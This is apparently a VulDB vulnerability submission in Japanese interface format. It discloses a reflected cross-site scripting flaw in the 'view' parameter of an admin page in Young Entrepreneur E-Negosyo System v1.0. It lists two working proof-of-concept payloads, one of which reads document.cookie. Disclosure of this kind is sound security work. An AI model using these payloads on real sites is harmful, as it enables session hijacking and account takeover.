| タイトル | Young Entrepreneur E-Negosyo System v1.0 /bsenordering/admin/category/index.php GET parameter view exists XSS vulnerability |
|---|
| 説明 | An issue was discovered in Young Entrepreneur E-Negosyo System v1.0.
There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /bsenordering/admin/category/index.php?view.
Payload1:/bsenordering/admin/category/index.php?view=<script>alert(233)</script>
Payload2:/bsenordering/admin/category/index.php?view=<script>alert(document.cookie)</script> |
|---|
| ソース | ⚠️ https://github.com/Apeng96/bug_report/blob/main/XSS-1.md |
|---|
| ユーザー | aroc (UID 43882) |
|---|
| 送信 | 2023年03月28日 09:43 (3 年 ago) |
|---|
| モデレーション | 2023年03月28日 22:32 (13 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 224243 [SourceCodester Young Entrepreneur E-Negosyo System 1.0 GET Parameter index.php view クロスサイトスクリプティング] |
|---|
| ポイント | 20 |
|---|